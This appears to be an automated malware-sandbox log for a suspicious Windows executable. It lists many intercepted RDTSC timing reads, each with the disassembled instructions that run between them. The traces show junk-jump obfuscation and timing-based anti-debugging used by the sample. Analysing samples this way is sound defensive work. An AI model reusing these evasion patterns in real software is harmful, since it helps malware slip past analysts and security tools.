Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60983 second address: 4D609DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esi+40h], eax 0x00000009 jmp 00007F9899183FF7h 0x0000000e lea eax, dword ptr [ebx+00000080h] 0x00000014 pushad 0x00000015 jmp 00007F9899183FF4h 0x0000001a jmp 00007F9899183FF2h 0x0000001f popad 0x00000020 push 00000001h 0x00000022 pushad 0x00000023 mov dh, ch 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D609DA second address: 4D60A1F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F98991A275Fh 0x00000008 sub eax, 0B3BB26Eh 0x0000000e jmp 00007F98991A2769h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F98991A275Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60B18 second address: 4D60B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60B3B second address: 4D60BD7 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, 4FC2BA0Bh 0x0000000c popad 0x0000000d js 00007F99092412D1h 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F98991A275Ah 0x0000001b sub eax, 7CF43418h 0x00000021 jmp 00007F98991A275Bh 0x00000026 popfd 0x00000027 pushfd 0x00000028 jmp 00007F98991A2768h 0x0000002d xor esi, 539B9E78h 0x00000033 jmp 00007F98991A275Bh 0x00000038 popfd 0x00000039 popad 0x0000003a pushad 0x0000003b push ecx 0x0000003c pop ebx 0x0000003d call 00007F98991A2762h 0x00000042 pop ecx 0x00000043 popad 0x00000044 popad 0x00000045 mov eax, dword ptr [ebp-0Ch] 0x00000048 jmp 00007F98991A2761h 0x0000004d mov dword ptr [esi+04h], eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F98991A275Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60BD7 second address: 4D60BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60BDE second address: 4D60C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebx+78h] 0x0000000a pushad 0x0000000b call 00007F98991A275Fh 0x00000010 mov ah, 78h 0x00000012 pop edx 0x00000013 mov bl, cl 0x00000015 popad 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b movsx ebx, si 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60C06 second address: 4D60C7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushfd 0x00000008 jmp 00007F9899183FF7h 0x0000000d adc ecx, 5154EB0Eh 0x00000013 jmp 00007F9899183FF9h 0x00000018 popfd 0x00000019 pop esi 0x0000001a popad 0x0000001b push esi 0x0000001c jmp 00007F9899183FECh 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007F9899183FEDh 0x0000002c pop ecx 0x0000002d jmp 00007F9899183FF1h 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60C7A second address: 4D60CD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98991A2767h 0x00000009 add cx, D32Eh 0x0000000e jmp 00007F98991A2769h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F98991A2768h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CD4 second address: 4D60CDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CDA second address: 4D60CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CE9 second address: 4D60CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60CED second address: 4D60D08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D08 second address: 4D60D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9899183FF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D20 second address: 4D60D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D60 second address: 4D60D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D64 second address: 4D60D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60D6A second address: 4D60DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d jmp 00007F9899183FEDh 0x00000012 pop esi 0x00000013 popad 0x00000014 test edi, edi 0x00000016 jmp 00007F9899183FEAh 0x0000001b js 00007F9909222904h 0x00000021 jmp 00007F9899183FF0h 0x00000026 mov eax, dword ptr [ebp-04h] 0x00000029 jmp 00007F9899183FF0h 0x0000002e mov dword ptr [esi+08h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edi, 75195430h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60DD1 second address: 4D60DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60DD6 second address: 4D60EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F9899183FF0h 0x00000011 push 00000001h 0x00000013 jmp 00007F9899183FF0h 0x00000018 nop 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F9899183FEEh 0x00000020 or cx, AE08h 0x00000025 jmp 00007F9899183FEBh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F9899183FF8h 0x00000031 or eax, 2626D068h 0x00000037 jmp 00007F9899183FEBh 0x0000003c popfd 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F9899183FEFh 0x00000046 and si, 53AEh 0x0000004b jmp 00007F9899183FF9h 0x00000050 popfd 0x00000051 jmp 00007F9899183FF0h 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60EAA second address: 4D60EC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60EC7 second address: 4D60F3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F9899183FEEh 0x00000011 nop 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F9899183FEEh 0x00000019 adc cx, ED18h 0x0000001e jmp 00007F9899183FEBh 0x00000023 popfd 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F9899183FEEh 0x00000032 xor cx, D778h 0x00000037 jmp 00007F9899183FEBh 0x0000003c popfd 0x0000003d mov si, CEAFh 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60F3C second address: 4D60F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60F95 second address: 4D60FCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edi, eax 0x0000000e jmp 00007F9899183FF3h 0x00000013 test edi, edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9899183FF0h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FCC second address: 4D60FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FD0 second address: 4D60FD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D60FD6 second address: 4D61025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 33h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9909240E27h 0x0000000e jmp 00007F98991A2762h 0x00000013 mov eax, dword ptr [ebp-14h] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a popad 0x0000001b mov ecx, esi 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 mov ax, bx 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 jmp 00007F98991A2763h 0x0000002c mov edx, 74E806ECh 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61025 second address: 4D610E0 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, 00000000h 0x0000000c jmp 00007F9899183FF4h 0x00000011 lock cmpxchg dword ptr [edx], ecx 0x00000015 pushad 0x00000016 mov edx, esi 0x00000018 mov di, si 0x0000001b popad 0x0000001c pop edi 0x0000001d jmp 00007F9899183FF4h 0x00000022 test eax, eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F9899183FEEh 0x0000002b or ch, 00000008h 0x0000002e jmp 00007F9899183FEBh 0x00000033 popfd 0x00000034 popad 0x00000035 jne 00007F990922263Bh 0x0000003b jmp 00007F9899183FF5h 0x00000040 mov edx, dword ptr [ebp+08h] 0x00000043 jmp 00007F9899183FEEh 0x00000048 mov eax, dword ptr [esi] 0x0000004a jmp 00007F9899183FF0h 0x0000004f mov dword ptr [edx], eax 0x00000051 jmp 00007F9899183FF0h 0x00000056 mov eax, dword ptr [esi+04h] 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D610E0 second address: 4D610E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D610E6 second address: 4D61107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, E041h 0x00000007 mov esi, 69F23F7Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+04h], eax 0x00000012 pushad 0x00000013 mov cl, E1h 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 mov eax, dword ptr [esi+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61107 second address: 4D61132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F98991A2764h 0x0000000a add si, D8B8h 0x0000000f jmp 00007F98991A275Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61132 second address: 4D611D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F9899183FEEh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F9899183FEEh 0x0000001b jmp 00007F9899183FF5h 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [edx+0Ch], eax 0x00000025 jmp 00007F9899183FEDh 0x0000002a mov eax, dword ptr [esi+10h] 0x0000002d jmp 00007F9899183FEEh 0x00000032 mov dword ptr [edx+10h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov di, 4F20h 0x0000003c call 00007F9899183FF9h 0x00000041 pop eax 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D611D0 second address: 4D612D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007F98991A2760h 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F98991A275Eh 0x0000001b jmp 00007F98991A2765h 0x00000020 popfd 0x00000021 call 00007F98991A2760h 0x00000026 pushfd 0x00000027 jmp 00007F98991A2762h 0x0000002c adc si, 5088h 0x00000031 jmp 00007F98991A275Bh 0x00000036 popfd 0x00000037 pop eax 0x00000038 popad 0x00000039 mov eax, dword ptr [esi+18h] 0x0000003c pushad 0x0000003d movsx ebx, ax 0x00000040 pushfd 0x00000041 jmp 00007F98991A275Eh 0x00000046 xor ecx, 4405B2E8h 0x0000004c jmp 00007F98991A275Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [edx+18h], eax 0x00000056 jmp 00007F98991A2766h 0x0000005b mov eax, dword ptr [esi+1Ch] 0x0000005e jmp 00007F98991A2760h 0x00000063 mov dword ptr [edx+1Ch], eax 0x00000066 pushad 0x00000067 pushfd 0x00000068 jmp 00007F98991A275Eh 0x0000006d xor ch, FFFFFFA8h 0x00000070 jmp 00007F98991A275Bh 0x00000075 popfd 0x00000076 push eax 0x00000077 push edx 0x00000078 mov esi, 6FA59BB5h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D612D2 second address: 4D6130C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+20h] 0x0000000d pushad 0x0000000e jmp 00007F9899183FEEh 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 mov eax, edi 0x00000019 popad 0x0000001a popad 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6130C second address: 4D61310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61310 second address: 4D61316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61316 second address: 4D6139D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F98991A2766h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 pushad 0x00000015 mov bh, ah 0x00000017 call 00007F98991A2763h 0x0000001c pushad 0x0000001d popad 0x0000001e pop ecx 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+28h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F98991A275Bh 0x0000002a adc esi, 5EC90A6Eh 0x00000030 jmp 00007F98991A2769h 0x00000035 popfd 0x00000036 popad 0x00000037 mov dword ptr [edx+28h], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6139D second address: 4D613A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613A1 second address: 4D613A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613A7 second address: 4D613CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9899183FEAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613CA second address: 4D613D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A275Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D613D9 second address: 4D61422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b pushad 0x0000000c mov ax, 8289h 0x00000010 pushfd 0x00000011 jmp 00007F9899183FF6h 0x00000016 sbb eax, 7826BDD8h 0x0000001c jmp 00007F9899183FEBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ax, word ptr [esi+30h] 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 7EC6h 0x0000002e movsx edx, cx 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61422 second address: 4D61428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61428 second address: 4D61458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F9899183FF7h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b push edx 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D61458 second address: 4D6145E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6145E second address: 4D614E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+32h], ax 0x0000000f pushad 0x00000010 mov edi, 5F222310h 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+34h] 0x00000019 jmp 00007F9899183FEFh 0x0000001e mov dword ptr [edx+34h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F9899183FEBh 0x0000002a jmp 00007F9899183FF3h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F9899183FF8h 0x00000036 sub cl, FFFFFFE8h 0x00000039 jmp 00007F9899183FEBh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D614E2 second address: 4D614FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D614FA second address: 4D6152F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f mov bl, 5Bh 0x00000011 mov si, 5CD5h 0x00000015 popad 0x00000016 jne 00007F99092221EDh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9899183FF7h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6152F second address: 4D6155E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f jmp 00007F98991A275Dh 0x00000014 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F98991A275Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D6155E second address: 4D615B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007F9899183FEEh 0x00000012 pop esi 0x00000013 jmp 00007F9899183FF0h 0x00000018 pop ebx 0x00000019 jmp 00007F9899183FF0h 0x0000001e leave 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov si, dx 0x00000025 mov di, 033Ch 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4D615B3 second address: 4DB0301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98991A2762h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d push FFFFFFFEh 0x0000000f pop edi 0x00000010 mov dword ptr [ebp-04h], edi 0x00000013 mov eax, 00005A4Dh 0x00000018 cmp word ptr [00400000h], ax 0x0000001f jne 00007F98991A278Ah 0x00000021 mov eax, dword ptr [0040003Ch] 0x00000026 cmp dword ptr [eax+00400000h], 00004550h 0x00000030 jne 00007F98991A2779h 0x00000032 mov ecx, 0000010Bh 0x00000037 cmp word ptr [eax+00400018h], cx 0x0000003e jne 00007F98991A276Bh 0x00000040 cmp dword ptr [eax+00400074h], 0Eh 0x00000047 jbe 00007F98991A2762h 0x00000049 xor ecx, ecx 0x0000004b cmp dword ptr [eax+004000E8h], esi 0x00000051 setne cl 0x00000054 mov dword ptr [ebp-1Ch], ecx 0x00000057 jmp 00007F98991A2755h 0x00000059 xor ebx, ebx 0x0000005b inc ebx 0x0000005c push ebx 0x0000005d call 00007F98991A4845h 0x00000062 mov edi, edi 0x00000064 push ebp 0x00000065 mov ebp, esp 0x00000067 xor eax, eax 0x00000069 cmp dword ptr [ebp+08h], eax 0x0000006c push 00000000h 0x0000006e sete al 0x00000071 push 00001000h 0x00000076 push eax 0x00000077 call 00007F989DB4F53Bh 0x0000007c mov edi, edi 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0301 second address: 4DB0307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0307 second address: 4DB030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB030C second address: 4DB0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0312 second address: 4DB0316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0316 second address: 4DB0346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9899183FF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9899183FF7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0346 second address: 4DB035E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98991A2764h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB035E second address: 4DB0362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 4DB0362 second address: 4DB0371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
